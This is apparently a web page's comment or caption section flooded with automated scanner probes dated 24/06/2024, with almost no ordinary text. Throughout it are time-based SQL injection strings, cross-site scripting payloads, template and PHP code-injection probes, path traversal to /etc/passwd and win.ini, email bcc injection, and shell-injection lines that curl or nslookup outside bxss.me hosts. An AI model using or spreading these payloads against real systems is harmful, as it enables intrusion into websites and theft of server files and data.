24/06/2024

19746836

image
pHqghUme
24/06/2024

m1u8fsLU') OR 49=(SELECT 49 FROM PG_SLEEP(15))--

image
pHqghUme
24/06/2024

rqwsgShQ')) OR 621=(SELECT 621 FROM PG_SLEEP(15))--

image
pHqghUme
24/06/2024

<%={{={@{#{${dfb}}%>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1'"

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

@@R2fJq

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

dfb[[${98991*97996}]]xca

image
pHqghUme
24/06/2024

dfb__${98991*97996}__::.x

image
pHqghUme
24/06/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
pHqghUme9758220
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
-1 OR 3+343-343-1=0+0+0+1
24/06/2024

1

image
-1' OR 3+109-109-1=0+0+0+1 --
24/06/2024

1

image
-1' OR 2+892-892-1=0+0+0+1 or 'RtVKkTuI'='
24/06/2024

1

image
pHqghUme
24/06/2024

1<script>F2fv(9157)</script>

image
pHqghUme
24/06/2024

1<script>F2fv(9330)</script>9330

image
-1' OR 3+892-892-1=0+0+0+1 or 'RtVKkTuI'='
24/06/2024

1

image
-1" OR 2+993-993-1=0+0+0+1 --
24/06/2024

1

image
if(now()=sysdate(),sleep(15),0)
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
24/06/2024

1

image
tn3sSeDQ'; waitfor delay '0:0:15' --
24/06/2024

1

image
ufQbzi4K')); waitfor delay '0:0:15' --
24/06/2024

1

image
3nqX9xFl') OR 844=(SELECT 844 FROM PG_SLEEP(15))--
24/06/2024

1

image
xRnDUIvY')) OR 798=(SELECT 798 FROM PG_SLEEP(15))--
24/06/2024

1

image
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
24/06/2024

1

image
pHqghUme
24/06/2024

1<isindex type=image src=1 onerror=F2fv(9101)>

image
1'"
24/06/2024

1

image
@@Ni0nW
24/06/2024

1

image
pHqghUme
24/06/2024

1<body onload=F2fv(9120)>

image
pHqghUme
24/06/2024

1<img src=//xss.bxss.me/t/dot.gif onload=F2fv(9167)>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1<img src=xyz OnErRor=F2fv(9947)>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1<img/src=">" onerror=alert(9215)>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

<a HrEF=http://xss.bxss.me></a>

image
pHqghUme
24/06/2024

<a HrEF=jaVaScRiPT:>

image
pHqghUme
24/06/2024

1}body{zzz:Expre/**/SSion(F2fv(9858))}

image
pHqghUme
24/06/2024

12963Z <ScRiPt >F2fv(9183)</ScRiPt>

image
pHqghUme
24/06/2024

1<ifRAme sRc=9581.com></IfRamE>

image
GRLpGpAG
24/06/2024

1'"()&%<zzz><ScRiPt >odGM(9247)</ScRiPt>

image
pHqghUme
24/06/2024

1<a3G4rxu x=9924>

image
pHqghUme
24/06/2024

1<img sRc='http://attacker-9739/log.php?

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1<a6OLrNO<

image
pHqghUme
24/06/2024

1Cd2XrRB2AO

image
19YyTFvlYO
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

'+response.write(9775783*9021335)+'

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
24/06/2024

1

image
"+response.write(9642257*9731575)+"
24/06/2024

1

image
GRLpGpAG
24/06/2024

19112596

image
QHQ3SnMA
24/06/2024

1

image
GRLpGpAG
24/06/2024

19615570

image
pHqghUme
24/06/2024

1

image
pHqghUme bcc:074625.16574-30067.16574.b5b89.19898.2@bxss.me
24/06/2024

1

image
pHqghUme
24/06/2024

1<esi:include src="http://bxss.me/rpb.png"/>

image
GRLpGpAG'"()&%<zzz><ScRiPt >wXPi(9751)</ScRiPt>
24/06/2024

1

image
pHqghUme<esi:include src="http://bxss.me/rpb.png"/>
24/06/2024

1

image
pHqghUme
24/06/2024

${10000451+9999697}

image
to@example.com> bcc:074625.16574-30068.16574.b5b89.19898.2@bxss.me
24/06/2024

1

image
${9999460+10000494}
24/06/2024

1

image
SDB0R1BjVGs=
24/06/2024

1

image
'"()&%<zzz><ScRiPt >wXPi(9991)</ScRiPt>
24/06/2024

1

image
pHqghUme&n933019=v987391
24/06/2024

1

image
pHqghUme
24/06/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
pHqghUme
24/06/2024

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

image
pHqghUme
24/06/2024

Http://bxss.me/t/fit.txt

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

../../../../../../../../../../../../../../etc/passwd

image
pHqghUme
24/06/2024

/etc/shells

image
pHqghUme
24/06/2024

../../../../../../../../../../../../../../windows/win.ini

image
pHqghUme
24/06/2024

bxss.me

image
pHqghUme
24/06/2024

)

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
24/06/2024

1

image
pHqghUme
24/06/2024

!(()&&!|*|*|

image
pHqghUme
24/06/2024

echo hjpfkh$()\ upjkfo\nz^xyu||a #' &echo hjpfkh$()\ upjkfo\nz^xyu||a #|" &echo hjpfkh$()\ upjkfo\nz^xyu||a #

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

&echo hmzirs$()\ ozrbze\nz^xyu||a #' &echo hmzirs$()\ ozrbze\nz^xyu||a #|" &echo hmzirs$()\ ozrbze\nz^xyu||a #

image
pHqghUme
24/06/2024

../1

image
pHqghUme
24/06/2024

1&echo mqrxrt$()\ dxpgvx\nz^xyu||a #' &echo mqrxrt$()\ dxpgvx\nz^xyu||a #|" &echo mqrxrt$()\ dxpgvx\nz^xyu||a #

image
pHqghUme
24/06/2024

'.gethostbyname(lc('hitmr'.'yjmadpeaa1113.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(76).chr(109).chr(83).'

image
pHqghUme
24/06/2024

".gethostbyname(lc("hitzx"."dbqouwbgdad52.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(87).chr(111).chr(86)."

image
Http://bxss.me/t/fit.txt
24/06/2024

1

image
pHqghUme
24/06/2024

|echo nkhbub$()\ jtjaww\nz^xyu||a #' |echo nkhbub$()\ jtjaww\nz^xyu||a #|" |echo nkhbub$()\ jtjaww\nz^xyu||a #

image
!(()&&!|*|*|
24/06/2024

1

image
http://bxss.me/t/fit.txt?.jpg
24/06/2024

1

image
pHqghUme
24/06/2024

1|echo cjcnbc$()\ qvnyoi\nz^xyu||a #' |echo cjcnbc$()\ qvnyoi\nz^xyu||a #|" |echo cjcnbc$()\ qvnyoi\nz^xyu||a #

image
/etc/shells
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
".gethostbyname(lc("hitzw"."fnqdihgae3348.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(83).chr(108).chr(74)."
24/06/2024

1

image
file:///etc/passwd
24/06/2024

1

image
^(#$!@#$)(()))******
24/06/2024

1

image
c:/windows/win.ini
24/06/2024

1

image
pHqghUme
24/06/2024

-1 OR 2+218-218-1=0+0+0+1 --

image
pHqghUme
24/06/2024

-1 OR 2+221-221-1=0+0+0+1

image
./pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1"&&sleep(27*1000)*mxpkxq&&"

image
pHqghUme
24/06/2024

bxss.me/t/xss.html?%00

image
HttP://bxss.me/t/xss.html?%00
24/06/2024

1

image
../../../../../../../../../../etc/passwd.jpg
24/06/2024

1

image
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
24/06/2024

1

image
bxss.me/t/xss.html?%00
24/06/2024

1

image
pHqghUme
24/06/2024

${@print(md5(31337))}

image
pHqghUme
24/06/2024

${@print(md5(31337))}\

image
"+"A".concat(70-3).concat(22*4).concat(106).concat(75).concat(113).concat(72)+(require"socket" Socket.gethostbyname("hitnd"+"jnmmadtuaa87a.bxss.me.")[3].to_s)+"
24/06/2024

1

image
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
24/06/2024

1

image
'+'A'.concat(70-3).concat(22*4).concat(121).concat(89).concat(106).concat(65)+(require'socket' Socket.gethostbyname('hityx'+'vrficrowf4a72.bxss.me.')[3].to_s)+'
24/06/2024

1

image
pHqghUme'&&sleep(27*1000)*prpzze&&'
24/06/2024

1

image
pHqghUme
24/06/2024

'.print(md5(31337)).'

image
%2fetc%2fpasswd
24/06/2024

1

image
/.././.././.././.././.././.././.././../etc/./passwd%00
24/06/2024

1

image
pHqghUme
24/06/2024

(nslookup -q=cname hitbdurwmmmcsa62c0.bxss.me||curl hitbdurwmmmcsa62c0.bxss.me))

image
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
24/06/2024

1

image
pHqghUme
24/06/2024

$(nslookup -q=cname hitdxxzqqrmkz0e69d.bxss.me||curl hitdxxzqqrmkz0e69d.bxss.me)

image
pHqghUme"||sleep(27*1000)*oxetdk||"
24/06/2024

1

image
pHqghUme
24/06/2024

-1' OR 2+23-23-1=0+0+0+1 or 'mDrbPLVY'='

image
pHqghUme
24/06/2024

comment

image
pHqghUme
24/06/2024

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

image
pHqghUme
24/06/2024

-1" OR 2+377-377-1=0+0+0+1 --

image
pHqghUme
24/06/2024

&(nslookup -q=cname hitbcfhxazakaf1c43.bxss.me||curl hitbcfhxazakaf1c43.bxss.me)&'\"`0&(nslookup -q=cname hitbcfhxazakaf1c43.bxss.me||curl hitbcfhxazakaf1c43.bxss.me)&`'

image
xfs.bxss.me
24/06/2024

1

image
pHqghUme
24/06/2024

`(nslookup -q=cname hitnaftjlaucuceaeb.bxss.me||curl hitnaftjlaucuceaeb.bxss.me)`

image
echo hhdmud$()\ zoeyfm\nz^xyu||a #' &echo hhdmud$()\ zoeyfm\nz^xyu||a #|" &echo hhdmud$()\ zoeyfm\nz^xyu||a #
24/06/2024

1

image
pHqghUme
24/06/2024

'"

image
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
24/06/2024

1

image
pHqghUme&echo kwhdmw$()\ rcylmg\nz^xyu||a #' &echo kwhdmw$()\ rcylmg\nz^xyu||a #|" &echo kwhdmw$()\ rcylmg\nz^xyu||a #
24/06/2024

1

image
|echo aqmcgk$()\ slhobf\nz^xyu||a #' |echo aqmcgk$()\ slhobf\nz^xyu||a #|" |echo aqmcgk$()\ slhobf\nz^xyu||a #
24/06/2024

1

image
$(nslookup -q=cname hitchtfbwhdon9ff95.bxss.me||curl hitchtfbwhdon9ff95.bxss.me)
24/06/2024

1

image
comment
24/06/2024

1

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
24/06/2024

1

image
pHqghUme
24/06/2024

1'"()&%<zzz><ScRiPt >fyZl(9115)</ScRiPt>

image
&nslookup -q=cname hitndyitrsnxvf2137.bxss.me&'\"`0&nslookup -q=cname hitndyitrsnxvf2137.bxss.me&`'
24/06/2024

1

image
file:///etc/passwd
24/06/2024

1

image
${@print(md5(31337))}
24/06/2024

1

image
/\../\../\../\../\../\../\../etc/passwd
24/06/2024

1

image
|(nslookup -q=cname hitoiqxeglbkh908b6.bxss.me||curl hitoiqxeglbkh908b6.bxss.me)
24/06/2024

1

image
/WEB-INF/web.xml
24/06/2024

1

image
`(nslookup -q=cname hitqknzrtxmbu8f498.bxss.me||curl hitqknzrtxmbu8f498.bxss.me)`
24/06/2024

1

image
;(nslookup -q=cname hiticynvjawkx63cb0.bxss.me||curl hiticynvjawkx63cb0.bxss.me)|(nslookup -q=cname hiticynvjawkx63cb0.bxss.me||curl hiticynvjawkx63cb0.bxss.me)&(nslookup -q=cname hiticynvjawkx63cb0.bxss.me||curl hiticynvjawkx63cb0.bxss.me)
24/06/2024

1

image
C:\WINDOWS\system32\drivers\etc\hosts
24/06/2024

1

image
../../../../../../../../../../windows/win.ini.jpg
24/06/2024

1

image
..\..\..\..\..\..\..\..\windows\win.ini
24/06/2024

1

image
pHqghUme
24/06/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
pHqghUme
24/06/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
pHqghUme
24/06/2024

-1); waitfor delay '0:0:15' --

image
pHqghUme
24/06/2024

-1)); waitfor delay '0:0:15' --

image
..\..\..\..\..\..\..\..\windows\win.ini
24/06/2024

1

image
pHqghUme
24/06/2024

wfkmu1sC')); waitfor delay '0:0:15' --

image
pHqghUme
24/06/2024

-5 OR 545=(SELECT 545 FROM PG_SLEEP(15))--

image
WEB-INF/web.xml
24/06/2024

1

image
pHqghUme
24/06/2024

-5) OR 599=(SELECT 599 FROM PG_SLEEP(15))--

image
WEB-INF\web.xml
24/06/2024

1

image
pHqghUme'"()&%<zzz><ScRiPt >fyZl(9220)</ScRiPt>
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

rlB9b5eT') OR 565=(SELECT 565 FROM PG_SLEEP(15))--

image
pHqghUme
24/06/2024

iHWjns9l')) OR 47=(SELECT 47 FROM PG_SLEEP(15))--

image
pHqghUme
24/06/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
pHqghUme
24/06/2024

1'"

image
pHqghUme
24/06/2024

@@BuCAS

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
'"()&%<zzz><ScRiPt >fyZl(9587)</ScRiPt>
24/06/2024

1

image
pHqghUme9943290
24/06/2024

1

image
-1 OR 3+978-978-1=0+0+0+1
24/06/2024

1

image
bfg1973<s1﹥s2ʺs3ʹhjl1973
24/06/2024

1

image
-1' OR 2+142-142-1=0+0+0+1 or 'qZxHOa5u'='
24/06/2024

1

image
<th:t="${dfb}#foreach
24/06/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
24/06/2024

1

image
GRLpGpAG
24/06/2024

1

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
24/06/2024

1

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
24/06/2024

1

image
dfb{{98991*97996}}xca
24/06/2024

1

image
dfb[[${98991*97996}]]xca
24/06/2024

1

image
pHqghUme9318"();}]9998
24/06/2024

1

image
GRLpGpAG
24/06/2024

1 bcc:074625.16571-35368.16571.e68fb.19898.2@bxss.me

image
GRLpGpAG
24/06/2024

to@example.com> bcc:074625.16571-35369.16571.e68fb.19898.2@bxss.me

image
GRLpGpAG
24/06/2024

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

image
GRLpGpAG
24/06/2024

Http://bxss.me/t/fit.txt

image
../../../../../../../../../../../../../../etc/passwd
24/06/2024

1

image
GRLpGpAG|echo owbmes$()\ nidxjy\nz^xyu||a #' |echo owbmes$()\ nidxjy\nz^xyu||a #|" |echo owbmes$()\ nidxjy\nz^xyu||a #
24/06/2024

1

image
cjWJITZs'); waitfor delay '0:0:15' --
24/06/2024

1

image
bxss.me
24/06/2024

1

image
)
24/06/2024

1

image
GRLpGpAG
24/06/2024

".gethostbyname(lc("hitkw"."yuqxhcdpc15d1.bxss.me."))."A".chr(67).chr(hex("58")).chr(111).chr(69).chr(116).chr(74)."

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
GRLpGpAG
24/06/2024

-1 OR 2+504-504-1=0+0+0+1

image
GRLpGpAG
24/06/2024

-1' OR 2+512-512-1=0+0+0+1 --

image
CkZT05f3') OR 670=(SELECT 670 FROM PG_SLEEP(15))--
24/06/2024

1

image
GRLpGpAG
24/06/2024

-1' OR 2+650-650-1=0+0+0+1 or '7WcJsXN4'='

image
GRLpGpAG
24/06/2024

1

image
ESbH2oip')) OR 988=(SELECT 988 FROM PG_SLEEP(15))--
24/06/2024

1

image
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
24/06/2024

1

image
GRLpGpAG
24/06/2024

@@7lvnd

image
GRLpGpAG
24/06/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
@@VjxH4
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
comment
24/06/2024

1

image
-1' OR 2+987-987-1=0+0+0+1 or 'RbIgwVQT'='
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
GRLpGpAG
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
GRLpGpAG
24/06/2024

dfb{{98991*97996}}xca

image
GRLpGpAG
24/06/2024

dfb[[${98991*97996}]]xca

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

'+response.write(9697610*9654995)+'

image
'+response.write(9294592*9475229)+'
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
GRLpGpAG
24/06/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

../../../../../../../../../../../../../../etc/passwd

image
pHqghUme
24/06/2024

../../../../../../../../../../../../../../windows/win.ini

image
pHqghUme bcc:074625.16573-30037.16573.e49fd.19898.2@bxss.me
24/06/2024

1

image
pHqghUme
24/06/2024

&echo ldamof$()\ mujvds\nz^xyu||a #' &echo ldamof$()\ mujvds\nz^xyu||a #|" &echo ldamof$()\ mujvds\nz^xyu||a #

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

${9999877+10000052}

image
${10000167+10000490}
24/06/2024

1

image
GRLpGpAG
24/06/2024

1</script><script>xGaZ(9690)</script>

image
GRLpGpAG'"()&%<zzz><ScRiPt >xGaZ(9622)</ScRiPt>
24/06/2024

1

image
pHqghUme
24/06/2024

&(nslookup -q=cname hitsaiocloylwefe05.bxss.me||curl hitsaiocloylwefe05.bxss.me)&'\"`0&(nslookup -q=cname hitsaiocloylwefe05.bxss.me||curl hitsaiocloylwefe05.bxss.me)&`'

image
pHqghUme
24/06/2024

|(nslookup -q=cname hitojyoeyzlwr8b615.bxss.me||curl hitojyoeyzlwr8b615.bxss.me)

image
(nslookup -q=cname hitwfhmpfhubv01247.bxss.me||curl hitwfhmpfhubv01247.bxss.me))
24/06/2024

1

image
pHqghUme
24/06/2024

bxss.me

image
/etc/shells
24/06/2024

1

image
pHqghUme
24/06/2024

dfb@(98991*97996)xca

image
pHqghUme
24/06/2024

1'&&sleep(27*1000)*edrjry&&'

image
pHqghUme
24/06/2024

1'||sleep(27*1000)*nxgmhv||'

image
'.gethostbyname(lc('hitus'.'rywctiqfdb753.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(69).chr(120).chr(73).'
24/06/2024

1

image
pHqghUme
24/06/2024

';print(md5(31337));$a='

image
".gethostbyname(lc("hitjy"."owayefoqc49dc.bxss.me."))."A".chr(67).chr(hex("58")).chr(122).chr(89).chr(107).chr(84)."
24/06/2024

1

image
pHqghUme
24/06/2024

bxss.me/t/xss.html?%00

image
pHqghUme
24/06/2024

"+"A".concat(70-3).concat(22*4).concat(101).concat(77).concat(106).concat(88)+(require"socket" Socket.gethostbyname("hithi"+"cfrfogbk92fd2.bxss.me.")[3].to_s)+"

image
HttP://bxss.me/t/xss.html?%00
24/06/2024

1

image
pHqghUme
24/06/2024

";print(md5(31337));$a="

image
bxss.me/t/xss.html?%00
24/06/2024

1

image
pHqghUme
24/06/2024

dfb{{"abc"|title}}xca

image
pHqghUme
24/06/2024

${@print(md5(31337))}\

image
';print(md5(31337));$a='
24/06/2024

1

image
pHqghUme
24/06/2024

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

image
";print(md5(31337));$a="
24/06/2024

1

image
pHqghUme
24/06/2024

print("dfb" . 98991*97996 . "xca");

image
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
24/06/2024

1

image
${@print(md5(31337))}
24/06/2024

1

image
'"()
24/06/2024

1

image
dfb{{98991*97996}}xca
24/06/2024

1

image
pHqghUme
24/06/2024

-1 OR 2+749-749-1=0+0+0+1 --

image
pHqghUme
24/06/2024

-1 OR 2+781-781-1=0+0+0+1

image
%47%52%4C%70%47%70%41%47%39%32%30%32%22%28%29%3B%7D%5D%39%30%32%37
24/06/2024

1

image
pHqghUme
24/06/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
pHqghUme
24/06/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
GRLpGpAG
24/06/2024

1

image
pHqghUme
24/06/2024

dfb__${98991*97996}__::.x

image
pHqghUme
24/06/2024

1<ScRiPt >WniM(9302)</ScRiPt>

image
bfg2451<s1﹥s2ʺs3ʹhjl2451
24/06/2024

1

image
pHqghUme
24/06/2024

1<ScR<ScRiPt>IpT>WniM(9947)</sCr<ScRiPt>IpT>

image
pHqghUme
24/06/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
%70%48%71%67%68%55%6D%65%39%36%31%39%22%28%29%3B%7D%5D%39%37%31%35
24/06/2024

1

image
-1 OR 2+355-355-1=0+0+0+1 --
24/06/2024

1

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
24/06/2024

1

image
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
24/06/2024

1

image
pHqghUme
24/06/2024

1<input autofocus onfocus=WniM(9130)>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

1}body{zzz:Expre/**/SSion(WniM(9263))}

image
pHqghUme
24/06/2024

1

image
dfb{98991*97996}xca
24/06/2024

1

image
dfb{@98991*97996}xca
24/06/2024

1

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
24/06/2024

1

image
'+response.write(9446824*9292593)+'
24/06/2024

1

image
#{98991*97996*98991*97996}
24/06/2024

1

image
pHqghUme<esi:include src="http://bxss.me/rpb.png"/>
24/06/2024

1

image
dfb{{'abcd'.toUpperCase()}}xca
24/06/2024

1

image
pHqghUme
24/06/2024

|(nslookup -q=cname hitnlbmcjilpc2c44d.bxss.me||curl hitnlbmcjilpc2c44d.bxss.me)

image
pHqghUme
24/06/2024

;(nslookup -q=cname hitxylywckyxr02f0a.bxss.me||curl hitxylywckyxr02f0a.bxss.me)|(nslookup -q=cname hitxylywckyxr02f0a.bxss.me||curl hitxylywckyxr02f0a.bxss.me)&(nslookup -q=cname hitxylywckyxr02f0a.bxss.me||curl hitxylywckyxr02f0a.bxss.me)

image
pHqghUme
24/06/2024

1&n942862=v972591

image
echo psrohs$()\ ldxweg\nz^xyu||a #' &echo psrohs$()\ ldxweg\nz^xyu||a #|" &echo psrohs$()\ ldxweg\nz^xyu||a #
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
&(nslookup -q=cname hitohdlfxtvwvf85b7.bxss.me||curl hitohdlfxtvwvf85b7.bxss.me)&'\"`0&(nslookup -q=cname hitohdlfxtvwvf85b7.bxss.me||curl hitohdlfxtvwvf85b7.bxss.me)&`'
24/06/2024

1

image
dfb[[${98991*97996}]]xca
24/06/2024

1

image
Http://bxss.me/t/fit.txt
24/06/2024

1

image
bxss.me
24/06/2024

1

image
pHqghUme"||sleep(27*1000)*ooehbq||"
24/06/2024

1

image
pHqghUme
24/06/2024

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

image
pHqghUme
24/06/2024

-1); waitfor delay '0:0:15' --

image
'.print(md5(31337)).'
24/06/2024

1

image
pHqghUme<ScR<ScRiPt>IpT>58tF(9779)</sCr<ScRiPt>IpT>
24/06/2024

1

image
pHqghUme
24/06/2024

1'"()&%<zzz><ScRiPt >WWRY(9168)</ScRiPt>

image
pHqghUme
24/06/2024

D9vwU4QX') OR 475=(SELECT 475 FROM PG_SLEEP(15))--

image
pHqghUme<ScRiPt >58tF(9392)</ScRiPt>
24/06/2024

1

image
pHqghUme
24/06/2024

1'"

image
VNzV1Tj2
24/06/2024

1

image
-1 OR 2+375-375-1=0+0+0+1
24/06/2024

1

image
-1' OR 2+24-24-1=0+0+0+1 or '1CuhWgwi'='
24/06/2024

1

image
pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9993'>
24/06/2024

1

image
@@faEat
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

<%={{={@{#{${dfb}}%>

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

dfb{{98991*97996}}xca

image
pHqghUme<img/src=">" onerror=alert(9893)>
24/06/2024

1

image
pHqghUme\u003CScRiPt\58tF(9966)\u003C/sCripT\u003E
24/06/2024

1

image
pHqghUme
24/06/2024

19271"();}]9682

image
pHqghUme
24/06/2024

%31%39%30%38%33%22%28%29%3B%7D%5D%39%30%39%35

image
dfb[[${98991*97996}]]xca
24/06/2024

1

image
<a HrEF=jaVaScRiPT:>
24/06/2024

1

image
pHqghUme</script><script>WWRY(9748)</script>
24/06/2024

1

image
pHqghUme<aUzFwm8<
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme9134519
24/06/2024

1

image
dfb{@98991*97996}xca
24/06/2024

1

image
print("dfb" . 98991*97996 . "xca");
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

/../../../../../../../../../../windows/system32/BITSADMIN.exe

image
pHqghUme
24/06/2024

'+response.write(9087659*9686043)+'

image
pHqghUme
24/06/2024

"+response.write(9087659*9686043)+"

image
pHqghUme
24/06/2024

1

image
"+response.write(9638206*9122748)+"
24/06/2024

1

image
pHqghUme
24/06/2024

to@example.com> bcc:074625.16575-28373.16575.32ddd.19898.2@bxss.me

image
pHqghUme
24/06/2024

${9999133+10000496}

image
${10000236+9999649}
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
dfb{{98991*97996}}xca
24/06/2024

1

image
pHqghUme
24/06/2024

echo ysjere$()\ dismby\nz^xyu||a #' &echo ysjere$()\ dismby\nz^xyu||a #|" &echo ysjere$()\ dismby\nz^xyu||a #

image
pHqghUme
24/06/2024

&echo qzjean$()\ qcohfh\nz^xyu||a #' &echo qzjean$()\ qcohfh\nz^xyu||a #|" &echo qzjean$()\ qcohfh\nz^xyu||a #

image
pHqghUme
24/06/2024

1

image
pHqghUme
24/06/2024

../1

image
pHqghUme
24/06/2024

Http://bxss.me/t/fit.txt

image
pHqghUme<ScRiPt >603B(9698)</ScRiPt>
24/06/2024

1

image
file:///etc/passwd
24/06/2024

1

image
pHqghUme
24/06/2024

1&n961148=v947535

image
pHqghUme
24/06/2024

bxss.me

image
pHqghUme&echo mpxprg$()\ sixylg\nz^xyu||a #' &echo mpxprg$()\ sixylg\nz^xyu||a #|" &echo mpxprg$()\ sixylg\nz^xyu||a #
24/06/2024

1

image
;(nslookup -q=cname hittsgvavnsjm22632.bxss.me||curl hittsgvavnsjm22632.bxss.me)|(nslookup -q=cname hittsgvavnsjm22632.bxss.me||curl hittsgvavnsjm22632.bxss.me)&(nslookup -q=cname hittsgvavnsjm22632.bxss.me||curl hittsgvavnsjm22632.bxss.me)
24/06/2024

1

image
pHqghUme<ScRiPt >603B(9541)</ScRiPt>
24/06/2024

1

image
pHqghUme
24/06/2024

'"()

image
HttP://bxss.me/t/xss.html?%00
24/06/2024

1

image
pHqghUme
24/06/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
pHqghUme
24/06/2024

1

image
${@print(md5(31337))}
24/06/2024

1

image
pHqghUme'&&sleep(27*1000)*pepvpu&&'
24/06/2024

1

image
pHqghUme
24/06/2024

19318727

image
-1 OR 2+891-891-1=0+0+0+1
24/06/2024

1

image
if(now()=sysdate(),sleep(15),0)
24/06/2024

1

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
24/06/2024

1

image
pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
24/06/2024

1

image
pHqghUme
24/06/2024

1

image
pHqghUme<input autofocus onfocus=603B(9945)>
24/06/2024

1

image
pHqghUme'"()&%<zzz><ScRiPt >qhBP(9975)</ScRiPt>
24/06/2024

1

image
dfb{{98991*97996}}xca
24/06/2024

1

image
pHqghUme
24/06/2024

1'"()&%<zzz><ScRiPt >aaYq(9727)</ScRiPt>

image
pHqghUme
24/06/2024

dfb{{98991*97996}}xca

image
pHqghUme
24/06/2024

1<ScR<ScRiPt>IpT>aaYq(9319)</sCr<ScRiPt>IpT>

image
"+response.write(9133129*9728395)+"
24/06/2024

1

image
pHqghUme
24/06/2024

1 bcc:074625.16575-30941.16575.06c8e.19898.2@bxss.me

image
pHqghUme bcc:074625.16575-30943.16575.06c8e.19898.2@bxss.me
24/06/2024

1

image
to@example.com> bcc:074625.16575-30944.16575.06c8e.19898.2@bxss.me
24/06/2024

1

image
pHqghUme
24/06/2024

${9999267+9999632}

image
pHqghUme
24/06/2024

../../../../../../../../../../../../../../windows/win.ini

image
pHqghUme
24/06/2024

